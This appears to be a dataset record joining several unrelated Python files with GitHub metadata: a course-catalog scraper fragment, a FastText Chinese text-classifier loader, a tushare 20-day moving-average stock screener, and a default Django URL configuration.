    # Departments is a dict keyed by subject code, so resolve a numeric index into a key first
    department_keys = list(Departments.keys())
    if -1 == random_department_index:
        random_department_index = random.randint(0, len(department_keys) - 1)
    department = Departments[department_keys[random_department_index]]
    if -1 == random_course_index:
        random_course_index = random.randint(0, len(department.courses) - 1)
    print("random_department_index = ", random_department_index)
    department.display_institution_id()
    department.display_institution_name()
    department.display_department_name()
    department.display_number_of_courses()
    print("random_course_index = ", random_course_index)
    print("courses length = ", len(department.courses))
    course = department.courses[random_course_index]
    print("\tcourse name = ", course.name)
    print("\tcourse code = ", course.code)
    print("\tofferings = ", course.offerings)
    print("\tcourse description = ", course.description)
    print("\tprerequisites = ", course.prerequisites)
    print("\tnotes = ", course.notes)
# In[39]:
if __name__ == "__main__":
main()
dump_output(Departments, "data/elmhurst_college_raw.csv")
# In[ ]:
run_sample_test(-1, -1)
# In[ ]:
x = "ENG 105 an approved statistics course and one college-level"
lst = set(re.findall(r'\b([A-Z][A-Z\s]*[A-Z]|[A-Z])\b', x))
all_subject_codes = set(['ART', 'BID', 'BIO', 'BUS', 'ECO', 'CHM', 'COM', 'THE', 'CSD', 'CGE', 'CS', 'IS', 'EDU', 'ELM', 'EYC', 'SEC', 'SPE', 'TEL', 'ENG', 'GEO', 'HIS', 'HON', 'ICS', 'KIN', 'MTH', 'MEH', 'AME', 'MUS', 'AMB', 'AMC', 'AMD', 'AMN', 'NRS', 'PHL', 'AST', 'PHY', 'POL', 'PSY', 'REL', 'SOC', 'CJ', 'URB', 'CHN', 'FRN', 'GRM', 'JPN', 'SPN', 'WL', 'CPP', 'GIS', 'ISG', 'IT', 'SCM', 'MBA', 'MIT', 'MDS', 'MEC', 'MTL', 'AGS', 'MPH', 'MOT', 'HCA', 'MPM', 'APH'])
len(lst & all_subject_codes)
# In[ ]:
MAP_DEPARTMENTS["MTH"]
# In[32]:
class xClass:
    val = -1
def __init__(self, val):
self.val = val
arrXClass = {}
a = xClass(10)
b = xClass(20)
arrXClass["a"]=a
arrXClass["b"]=b
# In[33]:
print(arrXClass)
# In[35]:
a.val = 40
for key, obj in arrXClass.items():
#for obj in arrXClass:
print(obj.val)
# In[ ]:
aa=None
if aa:
print("fund")
else:
print("notfund")
|
[
"noreply@github.com"
] |
RDulepet19.noreply@github.com
|
0f9da5641c14d6d47418ae74359cbd602a3a8681
|
178eb0567fd21b65df6f95d7342d971fb253f91e
|
/AI/Classifiers/models/load.py
|
d0adbb5c1c02bded01575f019398c91e8808eb4a
|
[] |
no_license
|
Zhaofan-Su/SemanticAnalysis
|
defacbcde5f6c541de9c4cfa37138a449c03ce60
|
f28813bf21d6170ffe826dd7edcad73cc244da9b
|
refs/heads/master
| 2020-05-07T11:59:15.138559
| 2019-04-23T00:53:45
| 2019-04-23T00:53:45
| 180,484,689
| 0
| 0
| null | 2019-04-17T02:46:54
| 2019-04-10T02:20:34
|
Python
|
UTF-8
|
Python
| false
| false
| 2,124
|
py
|
import os
import torch
import torch.nn.functional as F
import datetime
import torch.autograd as autograd
import jieba.posseg as pseg
from .fasttext import FastText
import torchtext.data as data
from .input import Dataset
from torchtext.vocab import Vectors
import os.path as path
def _chinese_tokenizer(sentence):
exclusion = ["e", "x", "y"] # e 叹词 x 非语素词 y 语气词
return [word for (word, flag) in pseg.cut(sentence) if flag not in exclusion]
def load_data(target, config):
text_field = data.Field(tokenize=_chinese_tokenizer)
label_field = data.Field(sequential=False)
train_data, test_data = Dataset.split(target, text_field, label_field, config)
embedding = path.join(path.dirname(path.abspath(__file__)), config.PRETRAINED_EMBEDDING)
cache = path.join(path.dirname(path.abspath(__file__)), ".vector_cache/")
weights = Vectors(name=embedding, cache=cache)
text_field.build_vocab([{key: 1} for key in weights.itos], vectors=weights)
label_field.build_vocab(train_data)
config.EMBED_NUM = len(text_field.vocab)
config.EMBED_DIM = len(weights.vectors[0])
config.CLASS_NUM = len(label_field.vocab) - 1
return text_field, label_field
def load_model(model_name, ckpt, text_field, config):
model = None
if model_name == "FastText":
model = FastText(config, text_field.vocab.vectors)
if config.CUDA:
torch.cuda.set_device(config.DEVICE)
model = model.cuda()
device = config.DEVICE if config.CUDA else "cpu"
model.load_state_dict(torch.load(path.join(path.dirname(path.abspath(__file__)), ckpt), map_location=device))
return model
def predict(model, text_field, label_field, sentence, config):
model.eval()
sentence = text_field.preprocess(sentence)
# while len(sentence) < 3:
# sentence.append("<pad>")
sentence = [[text_field.vocab.stoi[x] for x in sentence]]
x = torch.tensor(sentence)
x = autograd.Variable(x)
if config.CUDA:
x = x.cuda()
output = model(x)
_, pred = torch.max(output, 1)
return label_field.vocab.itos[pred.data[0]+1] == "0"
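# Illustrative call order for the helpers above; the target name, checkpoint path and config
# object are hypothetical and should be adjusted to the project layout.
#   text_field, label_field = load_data("sentiment", config)
#   model = load_model("FastText", "snapshot/best_model.pt", text_field, config)
#   predict(model, text_field, label_field, "a sentence to classify", config)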
|
[
"nee_11235@qq.com"
] |
nee_11235@qq.com
|
a2996d418df380689d0ce270efb07b78628d4bc2
|
6f98d1667a5c9d55d0a74dcee77b5c3c777653a5
|
/source/ma20/analysis_stock.py
|
8f57162586da3109aaf4f8b18d1301f607c63bb7
|
[] |
no_license
|
llzhi001/stock_strategy
|
55efec1ed95d9ba862fd71f705a5cca8ad3af751
|
237f9ccda0c806f06b99374a5680c5cb70c07899
|
refs/heads/master
| 2020-12-08T13:19:59.083121
| 2018-04-03T17:09:54
| 2018-04-03T17:09:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,643
|
py
|
# coding=utf-8
'''
Created on Nov 7, 2017-12:40:31 AM
@author: yubangwei_pc
'''
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import os
import tushare as ts
from datetime import datetime
# Consider fitting the 20-day moving average and taking its derivative?
m20_para = {'not_rising_days': 5,  # not rising for this many consecutive days => the 20-day MA is flat or falling
            'const_rising_days': 3  # rising for this many consecutive days => the 20-day MA has started to rise
            }
def is_rising(his_data_df, judge_para='ma20', const_times=3):
    '''
    If the series does not increase for not_rising_days consecutive days and then increases for
    const_rising_days consecutive days, it is considered rising, i.e. an inflection point has appeared.
    Keep this function single-purpose: it only detects the rising edge (or the falling edge).
    '''
    if None is his_data_df:
        return False
    recent_rising_days_th = const_times
    if len(his_data_df) < recent_rising_days_th:
        return False
    for i in range(recent_rising_days_th):
        if his_data_df[judge_para][0+i] <= his_data_df[judge_para][1+i]:
            return False
    return True
def is_not_rising(his_data_df, judge_para='ma20', const_not_rising_times=5):
if None is his_data_df:
return False
if len(his_data_df) < const_not_rising_times :
return False
for i in range(const_not_rising_times):
if his_data_df[judge_para][0+i] > his_data_df[judge_para][1+i]:
return False
return True
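# Illustrative (hypothetical) reading of the two checks above, with index 0 being the most recent
# day as tushare returns it: for ma20 values like
#   [10.6, 10.4, 10.2, 10.0, 10.0, 10.0, 10.0, 10.0, 10.0]
# is_rising(...) holds because the three newest values strictly increase, and is_not_rising(...)
# holds on the five preceding days because they never rose; together these mark the upward
# inflection that Ma20_rising_strategy below looks for.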
def update_stock_code():
with open('.\\stock_code.txt', 'r') as fid:
try:
stock_code_id = fid.readlines()
record_date = stock_code_id[-1]
record_date = pd.Timestamp(record_date)
now_date = pd.Timestamp(datetime.now())
diff_date = now_date - record_date
if (diff_date.days < 20):
return
except:
print("Cannot get date information from stock file")
print("Updating the stocks id from network(...)")
    # more than 20 days since the stock codes were last refreshed, so refresh them again
with open('.\\stock_code.txt', 'w+') as fid:
stock_code_df = ts.get_today_all()
for i in stock_code_df.index:
fid.write('%s, %s\n'%(stock_code_df['code'][i], stock_code_df['name'][i]))
fid.write(datetime.now().strftime('%Y-%m-%d'))
def get_all_stock_id_and_name():
'''
    Returns: a dict mapping stock id to stock name
'''
update_stock_code()
with open('.\\stock_code.txt', 'r') as fid:
stock_code_id = fid.readlines()
        stock_code_id = stock_code_id[:len(stock_code_id)-1]  # the last line stores the refresh timestamp
stock_id_name_info = dict()
for stock_id_name in stock_code_id:
stock_id = stock_id_name.strip().split(',')[0]
stock_name = stock_id_name.strip().split(',')[1]
stock_id_name_info[stock_id] = stock_name
return stock_id_name_info
def Ma20_rising_strategy():
    '''Decide whether to buy or sell from inflection points of the ma20 curve: sell when it goes flat
    or turns down; buy when it starts rising. Whether it is rising is judged with the m20_para parameters.
    The codes of stocks to buy are saved together with plots of their 20-day moving averages.
    Reference: http://blog.sina.com.cn/s/blog_b598fcc90102xi1d.html
    '''
with open('.\\stock_code.txt', 'r') as fid:
stock_code_id = fid.readlines()
        stock_code_id = stock_code_id[:len(stock_code_id)-1]  # the last line stores the refresh timestamp
print("The following stocks' 20ma are rising:")
ma20_rising_file = open('.\\ma20\\m20_rising_stocks.txt', 'w+')
for stock_id_name in stock_code_id:
stock_id = stock_id_name.strip().split(',')[0]
stock_name = stock_id_name.strip().split(',')[1]
try:
            his_data_df = ts.get_hist_data(stock_id)  # data is returned in reverse chronological order, newest first
except:
print("Cannot get %s his data."%stock_id)
continue
if is_rising(his_data_df, 'ma20', m20_para['const_rising_days']) and \
is_not_rising(his_data_df[m20_para['const_rising_days']:], 'ma20', m20_para['not_rising_days']):
print('%s'%stock_id)
            plt.plot(his_data_df['ma20'][100:0:-1])  # reverse the slice because the data comes back newest first
#plt.show()
fig_name = '.\\ma20\\%s_%s.png'%(stock_id, stock_name)
plt.savefig(fig_name)
plt.close()
ma20_rising_file.write('%s\n'%stock_id_name)
print('code: %s'%(stock_id_name))
ma20_rising_file.close()
if __name__ == '__main__':
update_stock_code()
Ma20_rising_strategy()
|
[
"qiuyemingchong@163.com"
] |
qiuyemingchong@163.com
|
ec27f61e3c232a3694137ddddce91e9735b3c6fe
|
da9328c5a135429afeeedf099df62ed8cdf7bec2
|
/Train_new/urls.py
|
6818ea483abdb3d87d10679c0e98ce0a6868723d
|
[] |
no_license
|
dbissa94/Train_new
|
1eb51e670e55ef1fc548f2dd18b1d0c7fbd483e3
|
079ecc335d39a8bbed2f561bd5a2951e4a7a67bb
|
refs/heads/master
| 2020-03-23T15:26:55.024702
| 2018-07-20T19:23:14
| 2018-07-20T19:23:14
| 141,748,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 751
|
py
|
"""Train_new URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
|
[
"dbissa94@gmail.com"
] |
dbissa94@gmail.com
|